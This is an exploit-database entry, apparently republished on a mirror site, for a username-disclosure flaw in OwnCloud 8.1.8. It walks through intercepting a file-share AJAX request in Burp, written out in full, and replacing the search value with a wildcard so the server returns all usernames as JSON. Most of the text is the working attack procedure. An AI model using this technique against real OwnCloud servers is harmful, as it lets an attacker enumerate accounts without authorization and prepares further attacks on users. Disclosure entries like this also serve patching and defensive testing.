# Exploit Title: OwnCloud 8.1.8 - Username Disclosure # Exploit Author : Daniel Moreno # Exploit Date: 2019-11-29 # Vendor Homepage : https://owncloud.org/ # Link Software : https://ftp.icm.edu.pl/packages/owncloud/ (old version. Download at your own risk) # Tested on OS: CentOS # PoC: # 1. Create an account in OwnCloud # 2. Intercept connection with Burp # 3. Share a file, typing anything --------------------------------------------------------- 4. Burp will capture this request GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=bla*&limit=200&itemType=file HTTP/1.1 Host: XXXXXXXXXXXXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: */* Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate requesttoken: XXXXXXXXXXXXXXXXXXX OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Connection: close Referer: https://domain.com/index.php/apps/files/ Cookie: XXXXXXXXXXXXXXXX --------------------------------------------------------------------- 5. Send to Repeater 6. Change GET parameter to THIS: GET /index.php/core/ajax/share.php?fetch=getShareWith&*search=*&limit=200&itemType=file HTTP/1.1 7. Return valeus will be a JSON with all username informations
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
